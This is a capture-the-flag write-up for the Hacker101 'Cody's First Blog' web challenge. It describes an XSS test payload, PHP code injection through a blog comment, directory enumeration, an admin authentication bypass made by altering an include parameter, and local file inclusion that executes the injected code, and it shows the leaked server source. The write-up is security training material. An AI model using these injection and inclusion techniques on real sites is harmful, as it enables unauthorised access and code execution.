CTF — Hacker101 — Cody’s First Blog
So this one took me a while, as I was trying to solve it in an “overthinking” way and then realizing its not that complicated.
Moderate level, web, here we go.
FLAG0
So for the first flag, I tried a bunch of things without success.
After taking the hints, I realized this is about the first input, which was the comment box.
I started submitting some payloads like <img src=x onerror=alert(hacked)>, finding out that the comment was submitted and awaiting approval (hint for the next one, *umm* admin)
Knowing that the platform, in this case, is PHP, I figured “why not trying to inject some PHP code?” I tried and got my flag!
FLAG1
I started looking for something to work with.
I guess looking at the source code of the index page wouldn't hurt.
Opened the source code and found out a suspicious comment containing a link to the admin page, worth checking for sure.
Going to this link, indeed I reached the admin login page.
At this point, I was trying to login with a bunch of default credentials without success. Also, knowing that the webserver was hosted in Nginx I looked for a file that contained credentials/the default ones and couldn't find.
Moreover, using gobuster I found few surprises:
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.php (Status: 200)
/php.ini (Status: 200)
/posts (Status: 301)
/server-status (Status: 403)
Trying to look for something in php.ini (the configuration page for PHP based webserver) without anything that I could work with.
I also tried reaching ./htpasswd to see if I can get something from it.
As expected I got 403 forbidden, but the interesting part here is this: Apache/2.4.7 (Ubuntu) Server at 127.0.0.1 Port 54597
we can see the port that is being used here, and a quick check with Nmap telling me that it was open I tried connecting to the server.
Again, no success here. Going back to the index page I saw that “Cody” wrote “This server can’t talk to the outside world and nobody but me can upload files” — so I guess I cant connect from outside.
feeling a little frustrated at this point, I tried several more things like brute-forcing the login page to get in as admin. Since I didn't have the username nor password it was a very hard task and I thought to myself that there must be an easier way.
I looked in the URL, and the part that captured my eyes was the address of the admin link “page=admin.auth.inc”.
Since we all know that one must authenticate himself in order to log in, I figured what will happen if there will be no authentication here? could I just log in as admin?
I tried removing the auth part and got “page=admin.inc” and BAM! not only that I got my flag, but I'm also admin now, which means that I can approve comments! that must be useful for going on the next flag!
FLAG2
So, let's sum up what we know so far:
- we can write some PHP code and submit it as a comment
- we can approve it as admin
and now we need to execute it.
As we know already, “This server can’t talk to the outside world” so let's try to execute our code within our network.
By going to ?page=http://localhost/index I could see that that the comments I approved before were executed.
I tried a few pieces of code until I got the right one.
Using the command to read the index.php I was able to get the third flag.
PoC:
Approving the comment and going back to “localhost/index” using developer tools (F12) I saw that my PHP code executed as expected, showing me the third flag.
<?php
// ^FLAG^{FLAG2}$FLAG$
mysql_connect("localhost", "root", "");
mysql_select_db("level4");
$page = isset($_GET['page']) ? $_GET['page'] : 'home.inc';
if(strpos($page, ':') !== false && substr($page, 0, 5) !== "http:")
$page = "home.inc";
if(isset($_POST['body'])) {
mysql_query("INSERT INTO comments (page, body, approved) VALUES ('" . mysql_real_escape_string($page) . "', '" . mysql_real_escape_string($_POST['body']) . "', 0)");
if(strpos($_POST['body'], '<?php') !== false)
echo '<p>^FLAG^{FLAG1}$FLAG$</p>';
?>
